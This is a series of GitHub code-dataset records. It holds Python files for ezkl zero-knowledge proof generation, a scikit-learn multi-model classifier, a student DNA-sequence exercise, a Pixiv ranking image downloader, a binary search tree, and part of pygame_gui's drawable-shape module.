async_function(data_path, model_path, settings_path, resource_string):\n res = await ezkl.calibrate_settings(data_path, model_path, settings_path, resource_string)\n assert res == True\n\ndef gen_verifier(wrap_model, input_image, expected_output):\n print ('Challenge Image:')\n show_image(input_image, x_test_norm[target_indice[0]])\n\n model = sk2torch.wrap(wrap_model)\n x = torch.from_numpy(input_image)\n torch_out = model.predict(x)\n\n val = torch_out.item()\n\n if val != expected_output:\n #print (torch_out)\n print ('Error! Model trained by dataset predicting this image as animal is', val)\n return\n\n print ('Basic check passes, generate ZKML verifier')\n torch.onnx.export(model, # model being run\n # model input (or a tuple for multiple inputs)\n x,\n # where to save the model (can be a file or file-like object)\n \"network.onnx\",\n export_params=True, # store the trained parameter weights inside the model file\n opset_version=10, # the ONNX version to export the model to\n do_constant_folding=True, # whether to execute constant folding for optimization\n input_names=['input'], # the model's input names\n output_names=['output'], # the model's output names\n dynamic_axes={'input': {0: 'batch_size'}, # variable length axes\n 'output': {0: 'batch_size'}})\n\n d = ((x).detach().numpy()).reshape([-1]).tolist()\n\n data = dict(input_shapes=[target.shape[1:]],\n input_data=[d],\n output_data=[o.reshape([-1]).tolist() for o in torch_out])\n\n # Serialize data into file:\n json.dump(data, open(\"input.json\", 'w'))\n\n\n # TODO: Dictionary outputs\n res = ezkl.gen_settings(model_path, settings_path)\n assert res == True\n\n res = async_function(data_path, model_path, settings_path, \"resource\")\n #res = await ezkl.calibrate_settings(data_path, model_path, settings_path, resource_string)\n #assert res == True\n\n res = ezkl.compile_model(model_path, compiled_model_path, settings_path)\n assert res == True\n\n # srs path\n res = ezkl.get_srs(srs_path, settings_path)\n\n # now generate the witness file\n res = ezkl.gen_witness(data_path, compiled_model_path, witness_path, settings_path = settings_path)\n assert os.path.isfile(witness_path)\n\n res = ezkl.setup(\n compiled_model_path,\n vk_path,\n pk_path,\n srs_path,\n settings_path,\n )\n\n assert res == True\n assert os.path.isfile(vk_path)\n assert os.path.isfile(pk_path)\n assert 
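Note a real bug in `gen_verifier()` above: `async_function(...)` is called like a plain function, so Python only creates a coroutine object and discards it; the `ezkl.calibrate_settings` step never actually runs (and its asserted result is never checked). A hedged fix, assuming `calibrate_settings` is a coroutine as the surrounding code implies, is to drive it with `asyncio.run`:

```python
# Hedged fix for the un-awaited calibration step in gen_verifier().
import asyncio
import ezkl

def calibrate(data_path, model_path, settings_path, resource_string="resources"):
    # asyncio.run() actually executes the coroutine instead of discarding it.
    res = asyncio.run(
        ezkl.calibrate_settings(data_path, model_path, settings_path, resource_string)
    )
    assert res is True
    return res
```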
os.path.isfile(settings_path)\n\n # GENERATE A PROOF\n\n\n res = ezkl.prove(\n witness_path,\n compiled_model_path,\n pk_path,\n proof_path,\n srs_path,\n \"poseidon\", # for aggregated EVM proof only ELSE 'evm'\n \"single\",\n settings_path,\n )\n print ('Successfully generate ZK Proof!')\n print(res)\n assert os.path.isfile(proof_path)\n\n# gen_verifier(clean_model, target, True)\n#\n# sol_code_path = os.path.join('Verifier.sol')\n# abi_path = os.path.join('Verifier.abi')\n# res = ezkl.create_evm_verifier(\n# vk_path,\n# srs_path,\n# settings_path,\n# sol_code_path,\n# abi_path\n# )\n#\n# assert res == True\n# assert os.path.isfile(sol_code_path)\n\n","repo_name":"xzd1621/zkmlProver","sub_path":"BackEnd/Agg_Testing.py","file_name":"Agg_Testing.py","file_ext":"py","file_size_in_byte":9169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32750331163","text":"\"\"\"\nSupervised learning classification\n\"\"\"\nimport pandas as pd\nfrom timeit import default_timer as timer\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\nclass MultiClassifier:\n \"\"\"\n Uses multiple statistical classification models to classify data\n\n :param data: Pandas DataFrame dataset\n :param models: Dictionary of classificiation models\n \"\"\"\n def __init__(self, data, models):\n self.data = data\n self.models = models\n self.names = list(models.keys()) \n\n def preprocess(self, size=0.25):\n \"\"\"\n Preprocesses the dataset for training\n \"\"\"\n self.encoders = {}\n self.processed = {}\n\n for column in self.data.columns:\n # Encode all labels to value between 0..n-1\n self.encoders[column] = preprocessing.LabelEncoder()\n self.data[column] = self.encoders[column].fit_transform(self.data[column])\n \n # Split data into train and test\n data_X, data_y = self.data.iloc[:, 1:], self.data.iloc[:, 0]\n split_data = train_test_split(data_X, data_y, test_size=size)\n\n # Save y column name\n self.y_column = data_y.name\n \n self.processed['train_X'] = split_data[0]\n self.processed['test_X'] = split_data[1]\n self.processed['train_y'] = split_data[2]\n self.processed['test_y'] = split_data[3]\n\n def train_all(self):\n \"\"\"\n Train the dataset on each statistical model\n \"\"\"\n self.performances = []\n\n for key, model in self.models.items():\n start = timer()\n model.fit(self.processed['train_X'], self.processed['train_y'])\n end = timer()\n self.performances.append(end - start)\n\n def test_all(self):\n \"\"\"\n Test the statistical models on the test data and output its accuracy\n \n :returns: Accuracy score for each model (0.0-1.0)\n \"\"\"\n self.predictions = []\n self.accuracies = []\n\n for key, model in self.models.items():\n predict_y = model.predict(self.processed['test_X'])\n self.predictions.append(predict_y)\n accuracy = accuracy_score(self.processed['test_y'], predict_y)\n self.accuracies.append(accuracy)\n\n def predict_new(self, item):\n \"\"\"\n Classify new item based on trained data\n\n :param item: Pandas DataFrame for prediction\n :returns: Dictionary of predictions from each model\n \"\"\"\n for column in item.columns:\n item[column] = self.encoders[column].transform(item[column])\n \n # Predict using each model\n predictions = []\n for key, model in self.models.items():\n prediction = model.predict(item)\n # Decode back to actual label\n predictions.append(self.encoders[self.y_column].inverse_transform(prediction))\n\n return 
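A short usage sketch for the `MultiClassifier` defined above, assuming the class is importable from its module. The toy frame puts the label in the first column, which is what `preprocess()` expects, and all columns are categorical strings so the per-column `LabelEncoder` step applies; data and model choices are illustrative.

```python
# Illustrative driver for MultiClassifier (class defined in the record above).
import pandas as pd
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier

data = pd.DataFrame({
    "label":  ["a", "b", "a", "b", "a", "b", "a", "b"],
    "feat_1": ["x", "y", "x", "y", "y", "x", "x", "y"],
    "feat_2": ["p", "q", "q", "p", "p", "q", "q", "p"],
})
clf = MultiClassifier(data, {"tree": DecisionTreeClassifier(),
                             "nb": GaussianNB()})
clf.preprocess(size=0.25)   # encodes labels, then splits 75/25
clf.train_all()             # fits every model, timing each
clf.test_all()              # fills clf.accuracies
print(dict(zip(clf.names, clf.accuracies)))
```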
predictions","repo_name":"seanhelm/toadstool","sub_path":"toadstool/learn/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33849096515","text":"'''\nCreated on 2015. 12. 2.\n\n@author: User\n'''\ndef hamming(seq1,seq2):\n \n count = 0\n assert len(seq1)== len(seq2), 'strings should have equal length'\n for x in range(len(seq1)):\n if seq1[x] != seq2[x]:\n count += 1\n return count\n\ndef complement(seq):\n\n x = seq[::-1]\n count = ''\n for y in x:\n if y == 'T':\n count += 'A'\n elif y == 'C':\n count += 'G'\n elif y == 'A':\n count += 'T' \n elif y == 'G':\n count += 'C' \n return count\n\ndef normalform(seq):\n list1 = []\n vari = complement(seq)\n list1.append(seq)\n list1.append(vari)\n list.sort()\n return list1[0]\ndef occurrences(seq):\n list =[]\n dict = {}\n count = 0\n for x in seq:\n list.append(normalform(x))\n for seq in list:\n dict[seq] = list.append(seq)\n return\n\ndef errors(seq):\n seq = list(seq)\n correct = []\n incorrect = []\n group = set()\n list = set()\n list1 = []\n \n a = len(seq)\n seq1 = seq\n \n for x in range(len(seq)):\n if seq[x] != complement(seq[x]):\n seq1.append(object)\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n \n","repo_name":"isk02206/python","sub_path":"informatics/previous informatics/Informatics-2/series 8/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13337997150","text":"from pprint import pformat\nimport sys\nfrom typing import List\nimport requests\nimport re\nimport os\nimport datetime\nimport json\n\nheaders = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n \"referer\": \"https://www.pixiv.net/ranking.php?mode=daily&content=illust\",\n}\n\nPixivPath = \"./pixiv/\"\nrepeat = 1\nrepeat_user_name = 1\n\n\ndef getSinglePic(url, picPath):\n global repeat\n global repeat_user_name\n proxies = get_proxy()\n response = requests.get(url, headers=headers, proxies=proxies)\n if (\n re.search('\"xRestrict\":(.+?),\"sl\"', response.text).group()\n != '\"xRestrict\":0,\"sl\"'\n ):\n return False\n # 提取图片名称\n name = re.search('\"illustTitle\":\"(.+?)\"', response.text)\n name = name.group(1)\n illust_id = re.search('\"illustId\":\"(.+?)\"', response.text)\n illust_id = illust_id.group(1)\n user_name = re.search('\"userName\":\"(.+?)\"', response.text)\n user_name = user_name.group(1)\n if re.search('[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', name) != None:\n name = re.sub('[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', str(repeat), name)\n repeat += 1\n if re.search('[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', user_name) != None:\n user_name = re.sub(\n '[\\\\\\ \\/ \\* \\? 
\" \\: \\< \\> \\|]', str(repeat_user_name), user_name\n )\n repeat_user_name += 1\n # 提取图片原图地址\n picture = re.search('\"original\":\"(.+?)\"},\"tags\"', response.text)\n if picture == None:\n return False\n pic = requests.get(picture.group(1), headers=headers, proxies=proxies)\n print(picture.group(1))\n f = open(\n picPath + \"%s-by-%s.%s\" % (illust_id, user_name, picture.group(1)[-3:]), \"wb\"\n )\n f.write(pic.content)\n f.close()\n return True\n\n\ndef generateJson(picPath: str):\n # generate one picPath json file\n # generate_one_json(picPath)\n # generate other json file\n path = PixivPath\n dirs_all = os.listdir(path)\n for dir in dirs_all:\n pd = path + dir\n if os.path.isdir(pd):\n # json_file = get_file_list(pd+\"/\", ['.json'])\n generate_one_json(pd + \"/\")\n\n # generate url.json file with other json file url\n pixivPath = path\n pixivJsonPath = path + \"url.json\"\n path = [\n os.path.join(dp, f)\n for dp, dn, fs in os.walk(pixivPath)\n for f in fs\n if os.path.splitext(f)[1] in [\".json\"]\n ]\n path = [i for i in path if i.find(pixivJsonPath) == -1]\n pixiv_json = {\"pixiv\": path}\n jj = json.dumps(pixiv_json)\n f = open(pixivJsonPath, \"wb\")\n f.write(jj.encode())\n f.close()\n\n\n# generate one picPath json file\n\n\ndef generate_one_json(picPath):\n file_path = get_file_list(picPath, [\".jpg\", \".png\"])\n struct = rename_with_short_name(file_path)\n # check struct length\n if len(struct) == 0:\n return\n pixiv_json = {\"pixiv_pic\": struct}\n pixiv_json_path = picPath + \"pixiv_pic.json\"\n pixiv_json_file = open(pixiv_json_path, \"wb\")\n pixiv_json_file.write(json.dumps(pixiv_json).encode())\n pixiv_json_file.close()\n\n\ndef rename_with_short_name(files: List[str]):\n # a struct has name ,path and index\n struct = []\n for i in range(len(files)):\n file = files[i]\n file_name = os.path.basename(file)\n # check file name has \"-by-\"\n if file_name.find(\"-by-\") == -1:\n continue\n # 获取文件后缀\n file_ext = os.path.splitext(file_name)[1]\n id = file_name.split(\"_\")[0]\n user_name = file_name.split(\"-by-\")[1].split(\".\")[0]\n new_name = id + file_ext\n # renme and check file is exists\n if os.path.exists(os.path.dirname(file) + \"/\" + new_name):\n print(\"file exists\")\n new_name = id + \"-\" + str(i) + file_ext\n os.rename(file, os.path.dirname(file) + \"/\" + new_name)\n else:\n os.rename(file, os.path.dirname(file) + \"/\" + new_name)\n struct.append(\n {\n \"name\": id,\n # \"path\": files[i],\n \"index\": i,\n \"user\": user_name,\n \"ext\": file_ext,\n }\n )\n return struct\n\n\ndef get_file_list(path: str, file_ext: List[str]) -> List[str]:\n file_list: List[str] = [\n os.path.join(dp, f)\n for dp, dn, fs in os.walk(path)\n for f in fs\n if os.path.splitext(f)[1] in file_ext\n ]\n return file_list\n\n\ndef get_proxy():\n proxies = {\"http\": \"http://127.0.0.1:10900\", \"https\": \"http://127.0.0.1:10900\"}\n # proxies = None\n return proxies\n\n\ndef getAllPicUrl():\n count = 1\n dataTime = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n proxies = get_proxy()\n picPath = PixivPath + dataTime + \"/\"\n for n in range(1, 2):\n url = (\n \"https://www.pixiv.net/ranking.php?mode=daily&content=illust&p=%d&format=json\"\n % n\n )\n response = requests.get(url, headers=headers, proxies=proxies)\n illust_id = re.findall('\"illust_id\":(\\d+?),', response.text)\n if not os.path.exists(picPath):\n os.makedirs(picPath)\n picUrl = [\"https://www.pixiv.net/artworks/\" + i for i in illust_id]\n for url in picUrl:\n print(\"Downloading the picture %d \" % 
count, end=\" \")\n print(\"OK\" if getSinglePic(url, picPath) else \"FAILED\", end=\"\\n\")\n count += 1\n # os.system(\"ls -al\")\n generateJson(picPath)\n return None\n\n\ndef renameAndGenerateJson():\n # generate other json file\n path = PixivPath\n dirs_all = os.listdir(path)\n for dir in dirs_all:\n pd = path + dir\n if os.path.isdir(pd):\n # json_file = get_file_list(pd+\"/\", ['.json'])\n generate_one_json(pd + \"/\")\n\n\ngetAllPicUrl()\n# renameAndGenerateJson()\n","repo_name":"SABERBOY/PixivGenerator","sub_path":"pa.py","file_name":"pa.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8894945794","text":"__author__ = 'robbie'\n\nclass Queue:\n def __init__(self):\n self.items = []\n\n def isEmpty(self):\n return self.items == []\n\n def enqueue(self, item):\n self.items.insert(0, item)\n\n def dequeue(self):\n return self.items.pop()\n\n def size(self):\n return len(self.items)\n\n\nclass BSTNode:\n def __init__(self, e = None):\n self.element = e\n self.left = None\n self.right = None\n\n def __repr__(self):\n return str(self.element)\n\n def search(self,e):\n current = self\n found = False\n while not found and current:\n if current.element < e:\n current = current.right\n elif current.element > e:\n current = current.left\n else:\n found = True\n if found:\n return current\n else:\n return None\n\n def rinsert(self,e):\n if e.element > self.element:\n if self.right is None:\n self.right = e\n else:\n self.right.rinsert(e)\n if e.element < self.element:\n if self.left is None:\n self.left = e\n else:\n self.left.rinsert(e)\n\n def rsearch(self, e):\n #is equal\n if self.element == e.element:\n return True\n #is lower\n if e.element < self.element:\n if self.left is not None:\n return self.left.rsearch(e)\n else:\n return False\n #is higher\n if e.element > self.element:\n if self.right is not None:\n return self.right.rsearch(e)\n else:\n return False\n\n def rmax(self):\n if self.right is None:\n return self.element\n return self.right.rmax()\nclass BST:\n def __init__(self):\n self.root = None\n\n def search(self, e):\n if self.root and e:\n return self.root.search(e)\n else:\n return None\n\n def insert(self, e):\n if self.root is None and e:\n self.root = e\n else:\n self.root.rinsert(e)\n\n def search(self, e):\n if self.root and e:\n return self.root.rsearch(e)\n\n def max(self):\n return self.root.rmax()\n\n def showLevelOrder(self):\n q = Queue()\n level = 1\n if self.root is not None:\n q.enqueue(self.root)\n\n while q.isEmpty() is False:\n row = []\n while q.isEmpty() is False:\n row.append(q.dequeue())\n for elem in row:\n if elem.left is not None:\n q.enqueue(elem.left)\n if elem.right is not None:\n q.enqueue(elem.right)\n print('level' + str(level))\n print(row)\n level += 1\n\nbst = BST()\nbst.insert(BSTNode(8))\nbst.insert(BSTNode(5))\nbst.insert(BSTNode(4))\nbst.insert(BSTNode(9))\nbst.insert(BSTNode(18))\nbst.insert(BSTNode(19))\nbst.insert(BSTNode(72))\nbst.insert(BSTNode(1))\nbst.insert(BSTNode(56))\nbst.insert(BSTNode(62))\nbst.insert(BSTNode(61))\nprint(bst.search(BSTNode(6)))\nprint(bst.max())\nbst.showLevelOrder()\n","repo_name":"woodage/algortimes-and-datastructures-in-python","sub_path":"week 3/opdracht3.py","file_name":"opdracht3.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14683801545","text":"import math\n\nfrom collections import 
deque\nfrom typing import Dict, List, Union, Tuple, Optional\n\nimport pygame\n\nfrom pygame_gui.core.interfaces import IUIManagerInterface\nfrom pygame_gui.core.utility import basic_blit\n\nfrom pygame_gui.core.text import TextLineChunkFTFont, TextBoxLayout\nfrom pygame_gui.core.text.html_parser import HTMLParser\n\n\nclass DrawableShapeState:\n \"\"\"\n Represents a single state of a drawable shape.\n\n :param state_id: The ID/name of this state.\n\n \"\"\"\n def __init__(self, state_id: str):\n\n self.state_id = state_id\n self.surface = pygame.surface.Surface((0, 0), flags=pygame.SRCALPHA, depth=32)\n self.has_fresh_surface = False\n self.cached_background_id = None # type: Union[str, None]\n self.transition = None # type: Union[DrawableStateTransition, None]\n\n self.should_auto_pregen = self.state_id != 'disabled'\n self.generated = False\n\n # created if we have text\n self.text_surface: Optional[pygame.Surface] = None\n self.pre_text_surface: Optional[pygame.Surface] = None\n\n def get_surface(self) -> pygame.surface.Surface:\n \"\"\"\n Gets the pygame.surface.Surface of this state. Will be a blend of this state and\n the previous one if we are in a transition.\n\n :return: A pygame Surface for this state.\n\n \"\"\"\n if self.transition is not None:\n return self.transition.produce_blended_result()\n else:\n return self.surface\n\n def update(self, time_delta: float):\n \"\"\"\n Updates any transitions this state is in\n\n :param time_delta: The time passed between frames, measured in seconds.\n\n \"\"\"\n if self.transition is not None:\n self.transition.update(time_delta)\n self.has_fresh_surface = True\n if self.transition.finished:\n self.transition = None\n\n\nclass DrawableStateTransition:\n \"\"\"\n Starts & controls a transition between two states of a drawable shape.\n\n :param states: A dictionary of all the drawable states.\n :param start_state_id: The state to start from.\n :param target_state_id: The state to transition to.\n :param duration: The length of the transition\n :param progress: The initial progress along the transition.\n\n \"\"\"\n def __init__(self, states: Dict[str, DrawableShapeState],\n start_state_id: str, target_state_id: str,\n duration: float, *, progress: float = 0.0):\n\n self.states = states\n self.duration = duration\n self.remaining_time = self.duration - progress\n self.percentage_start_state = 1.0\n self.percentage_target_state = 0.0\n self.start_stat_id = start_state_id\n self.target_state_id = target_state_id\n self.finished = False\n\n def update(self, time_delta: float):\n \"\"\"\n Updates the timer for this transition.\n\n :param time_delta: The time passed between frames, measured in seconds.\n\n \"\"\"\n self.remaining_time -= time_delta\n if self.remaining_time > 0.0 and self.duration > 0.0:\n self.percentage_start_state = self.remaining_time / self.duration\n self.percentage_target_state = 1.0 - self.percentage_start_state\n else:\n self.finished = True\n\n def produce_blended_result(self) -> pygame.surface.Surface:\n \"\"\"\n Produces a blend between the images of our start state and our target state. 
The\n progression of the blend is dictated by the progress of time through the transition.\n\n :return: The blended surface.\n\n \"\"\"\n result = self.states[self.start_stat_id].surface.copy()\n blended_target = self.states[self.target_state_id].surface.copy()\n start_multiply_surface = pygame.surface.Surface(\n self.states[self.start_stat_id].surface.get_size(), flags=pygame.SRCALPHA, depth=32)\n target_multiply_surface = start_multiply_surface.copy()\n\n start_alpha = int(round(255.0*self.percentage_start_state))\n target_alpha = 255 - start_alpha\n\n start_multiply_surface.fill(pygame.Color(start_alpha, start_alpha, start_alpha, 255))\n target_multiply_surface.fill(pygame.Color(target_alpha, target_alpha, target_alpha, 255))\n\n result.blit(start_multiply_surface, (0, 0), special_flags=pygame.BLEND_RGB_MULT)\n blended_target.blit(target_multiply_surface, (0, 0), special_flags=pygame.BLEND_RGB_MULT)\n result.blit(blended_target, (0, 0), special_flags=pygame.BLEND_RGB_ADD)\n return result\n\n\nclass DrawableShape:\n \"\"\"\n Base class for a graphical 'shape' that we can use for many different UI elements. The intent\n is to make it easy to switch between UI elements having normal rectangles, circles or rounded\n rectangles as their visual shape while having the same non-shape related functionality.\n\n :param containing_rect: The rectangle which this shape is entirely contained within (including\n shadows, borders etc)\n :param theming_parameters: A dictionary of user supplied data that alters the appearance of\n the shape.\n :param states: Names for the different states the shape can be in, each may have different\n sets of colours & images.\n :param manager: The UI manager for this UI.\n\n \"\"\"\n def __init__(self,\n containing_rect: pygame.Rect,\n theming_parameters: Dict,\n states: List[str],\n manager: IUIManagerInterface):\n\n self.theming = theming_parameters\n self.containing_rect = containing_rect.copy()\n self.dynamic_width = True if self.containing_rect.width == -1 else False\n self.dynamic_height = True if self.containing_rect.height == -1 else False\n self.text_view_rect: Optional[pygame.Rect] = None\n\n self.shadow_width = 0\n self.border_width = 0\n self.shape_corner_radius = 0\n self.rounded_corner_offset = 0\n if 'shadow_width' in self.theming:\n self.shadow_width = self.theming['shadow_width']\n if 'border_width' in self.theming:\n self.border_width = self.theming['border_width']\n if 'shape_corner_radius' in self.theming:\n self.shape_corner_radius = self.theming['shape_corner_radius']\n self.rounded_corner_offset = int(self.shape_corner_radius -\n (math.sin(math.pi / 4) * self.shape_corner_radius))\n\n self.text_box_layout: Optional[TextBoxLayout] = None\n self.build_text_layout()\n\n self._evaluate_contents_for_containing_rect()\n self.containing_rect.width = max(self.containing_rect.width, 1)\n self.containing_rect.height = max(self.containing_rect.height, 1)\n\n self.initial_text_layout_size = (self.containing_rect.width,\n self.containing_rect.height)\n\n self.states = {}\n for state in states:\n self.states[state] = DrawableShapeState(state)\n\n if 'normal' in states:\n self.active_state = self.states['normal']\n else:\n raise NotImplementedError(\"No 'normal' state id supplied for drawable shape\")\n\n self.previous_state: Optional[DrawableShapeState] = None\n\n if 'transitions' in self.theming:\n self.state_transition_times = self.theming['transitions']\n else:\n self.state_transition_times = {}\n\n self.ui_manager = manager\n self.shape_cache = 
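`produce_blended_result()` above implements a linear crossfade with pygame blend flags: each state surface is multiplied by a weight-filled surface (`BLEND_RGB_MULT`) and the two are summed (`BLEND_RGB_ADD`), with the start weight `a = remaining_time / duration`. The same arithmetic expressed directly on arrays, as a small illustrative check of the formula `result = start*a + target*(1-a)`:

```python
# Crossfade math behind the surface blend, shown on plain numpy arrays.
import numpy as np

def crossfade(start_rgb, target_rgb, remaining, duration):
    a = max(0.0, min(1.0, remaining / duration))  # weight of the start state
    return (start_rgb * a + target_rgb * (1.0 - a)).astype(np.uint8)

start = np.full((4, 4, 3), 255, dtype=np.float64)   # white
target = np.zeros((4, 4, 3), dtype=np.float64)      # black
print(crossfade(start, target, remaining=0.25, duration=1.0)[0, 0])  # ~[63 63 63]
```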
self.ui_manager.get_theme().shape_cache\n\n self.states_to_redraw_queue = deque([])\n self.need_to_clean_up = True\n\n self.should_trigger_full_rebuild = True\n self.time_until_full_rebuild_after_changing_size = 0.35\n self.full_rebuild_countdown = self.time_until_full_rebuild_after_changing_size\n\n self.click_area_shape = self.containing_rect.copy()\n self.border_rect = self.containing_rect.copy()\n self.background_rect = self.containing_rect.copy()\n self.base_surface: Optional[pygame.Surface] = None\n\n self.only_text_changed = False\n\n def _evaluate_contents_for_containing_rect(self):\n if self.dynamic_width:\n # check to see if we have text and a font, this won't work with HTML\n # text - throw a warning?\n # What we really need to to is process the html text layout by this\n # point but hold off finalising and passing default colours until later?\n if self.text_box_layout is not None:\n text_width = self.text_box_layout.layout_rect.width\n\n horiz_padding = 0\n if 'text_horiz_alignment_padding' in self.theming:\n horiz_padding = self.theming['text_horiz_alignment_padding']\n\n # As well as the text width we want to throw in the borders,\n # shadows and any text padding\n final_width = (text_width +\n (2 * self.shadow_width) +\n (2 * self.border_width) +\n (2 * self.rounded_corner_offset) +\n (2 * horiz_padding))\n\n self.text_view_rect.width = text_width\n self.text_box_layout.view_rect.width = self.text_view_rect.width\n self.containing_rect.width = final_width\n if self.dynamic_height:\n if self.text_box_layout is not None:\n text_height = self.text_box_layout.layout_rect.height\n\n vert_padding = 0\n if 'text_vert_alignment_padding' in self.theming:\n vert_padding = self.theming['text_vert_alignment_padding']\n\n # As well as the text height we want to throw in the borders,\n # shadows and any text padding\n final_height = (text_height +\n (2 * self.shadow_width) +\n (2 * self.border_width) +\n (2 * self.rounded_corner_offset) +\n (2 * vert_padding))\n self.text_view_rect.height = text_height\n self.text_box_layout.view_rect.height = self.text_view_rect.height\n self.containing_rect.height = final_height\n\n def set_active_state(self, state_id: str):\n \"\"\"\n Changes the currently active state for the drawable shape and, if setup in the theme,\n creates a transition blend from the previous state to the newly active one.\n\n :param state_id: the ID of the new state to make active.\n\n \"\"\"\n\n # make sure this state is generated before we set it.\n # should ensure that some more rarely used states are only generated if we use them\n if not self.states[state_id].generated:\n if state_id in self.states_to_redraw_queue:\n self.states_to_redraw_queue.remove(state_id)\n self.redraw_state(state_id)\n\n if state_id in self.states and self.active_state.state_id != state_id:\n self.previous_state = self.active_state\n self.active_state = self.states[state_id]\n self.active_state.has_fresh_surface = True\n\n if self.previous_state is not None and ((self.previous_state.state_id,\n self.active_state.state_id) in\n self.state_transition_times):\n prev_id = self.previous_state.state_id\n next_id = self.active_state.state_id\n duration = self.state_transition_times[(self.previous_state.state_id,\n self.active_state.state_id)]\n if self.previous_state.transition is None:\n # completely fresh transition\n self.active_state.transition = DrawableStateTransition(self.states,\n prev_id,\n next_id,\n duration)\n else:\n # check to see if we are reversing an in-progress transition.\n if 
self.previous_state.transition.start_stat_id == self.active_state.state_id:\n progress_time = self.previous_state.transition.remaining_time\n transition = DrawableStateTransition(self.states,\n prev_id,\n next_id,\n duration,\n progress=progress_time)\n self.active_state.transition = transition\n\n def update(self, time_delta: float):\n \"\"\"\n Updates the drawable shape to process rebuilds and update blends between states.\n\n :param time_delta: amount of time passed between now and the previous frame in seconds.\n\n \"\"\"\n if len(self.states_to_redraw_queue) > 0:\n state = self.states_to_redraw_queue.popleft()\n self.redraw_state(state)\n if self.need_to_clean_up and len(self.states_to_redraw_queue) == 0:\n # last state so clean up\n self.clean_up_temp_shapes()\n self.need_to_clean_up = False\n\n if self.full_rebuild_countdown > 0.0:\n self.full_rebuild_countdown -= time_delta\n\n if self.should_trigger_full_rebuild and self.full_rebuild_countdown <= 0.0:\n self.full_rebuild_on_size_change()\n\n self.active_state.update(time_delta)\n\n def full_rebuild_on_size_change(self):\n \"\"\"\n Triggered when we've changed the size of the shape and need to rebuild basically everything\n to account for it.\n\n \"\"\"\n shape_params_changed = False\n if 'shadow_width' in self.theming and self.shadow_width != self.theming['shadow_width']:\n self.shadow_width = self.theming['shadow_width']\n shape_params_changed = True\n if 'border_width' in self.theming and self.border_width != self.theming['border_width']:\n self.border_width = self.theming['border_width']\n shape_params_changed = True\n if ('shape_corner_radius' in self.theming and\n self.shape_corner_radius != self.theming['shape_corner_radius']):\n self.shape_corner_radius = self.theming['shape_corner_radius']\n self.rounded_corner_offset = int(self.shape_corner_radius -\n (math.sin(math.pi / 4) * self.shape_corner_radius))\n shape_params_changed = True\n\n if shape_params_changed or self.initial_text_layout_size != self.containing_rect.size:\n self.build_text_layout()\n self.should_trigger_full_rebuild = False\n self.full_rebuild_countdown = self.time_until_full_rebuild_after_changing_size\n\n def redraw_all_states(self, force_full_redraw: bool = False):\n \"\"\"\n Starts the redrawing process for all states of this shape that auto pre-generate.\n Redrawing is done one state at a time so will take a few loops of the game to\n complete if this shape has many states.\n \"\"\"\n self.states_to_redraw_queue = deque([state_id for state_id, state in self.states.items()\n if (state.should_auto_pregen or force_full_redraw)])\n initial_state = self.states_to_redraw_queue.popleft()\n self.redraw_state(initial_state)\n\n def align_all_text_rows(self):\n \"\"\"\n Aligns the text drawing position correctly according to our theming options.\n\n \"\"\"\n # Horizontal alignment\n if 'text_horiz_alignment' in self.theming:\n if (self.theming['text_horiz_alignment'] == 'center' or\n self.theming['text_horiz_alignment'] not in ['left', 'right']):\n method = 'rect'\n if 'text_horiz_alignment_method' in self.theming:\n method = self.theming['text_horiz_alignment_method']\n self.text_box_layout.horiz_center_all_rows(method)\n elif self.theming['text_horiz_alignment'] == 'left':\n self.text_box_layout.align_left_all_rows(0)\n else:\n self.text_box_layout.align_right_all_rows(0)\n else:\n self.text_box_layout.horiz_center_all_rows('rect')\n\n # Vertical alignment\n if 'text_vert_alignment' in self.theming:\n if (self.theming['text_vert_alignment'] == 'center' or\n 
self.theming['text_vert_alignment'] not in ['top', 'bottom']):\n self.text_box_layout.vert_center_all_rows()\n elif self.theming['text_vert_alignment'] == 'top':\n self.text_box_layout.vert_align_top_all_rows(0)\n else:\n self.text_box_layout.vert_align_bottom_all_rows(0)\n else:\n self.text_box_layout.vert_center_all_rows()\n\n def get_active_state_surface(self) -> pygame.surface.Surface:\n \"\"\"\n Get the main surface from the active state.\n\n :return: The surface asked for, or the best available substitute.\n\n \"\"\"\n if self.active_state is not None:\n return self.active_state.get_surface()\n else:\n return self.ui_manager.get_universal_empty_surface()\n\n def get_surface(self, state_name: str) -> pygame.surface.Surface:\n \"\"\"\n Get the main surface from a specific state.\n\n :param state_name: The state we are trying to get the surface from.\n\n :return: The surface asked for, or the best available substitute.\n\n \"\"\"\n if state_name in self.states and self.states[state_name].surface is not None:\n return self.states[state_name].surface\n elif state_name in self.states and self.states['normal'].surface is not None:\n return self.states['normal'].surface\n else:\n return pygame.surface.Surface((0, 0), flags=pygame.SRCALPHA, depth=32)\n\n def get_fresh_surface(self) -> pygame.surface.Surface:\n \"\"\"\n Gets the surface of the active state and resets the state's 'has_fresh_surface' variable.\n\n :return: The active state's main pygame.surface.Surface.\n\n \"\"\"\n self.active_state.has_fresh_surface = False\n return self.get_active_state_surface()\n\n def has_fresh_surface(self) -> bool:\n \"\"\"\n Lets UI elements find out when a state has finished building a fresh surface for times\n when we have to delay it for whatever reason.\n\n :return: True if there is a freshly built surface waiting, False if the shape has not\n changed.\n\n \"\"\"\n return self.active_state.has_fresh_surface\n\n def finalise_images_and_text(self,\n image_state_str: 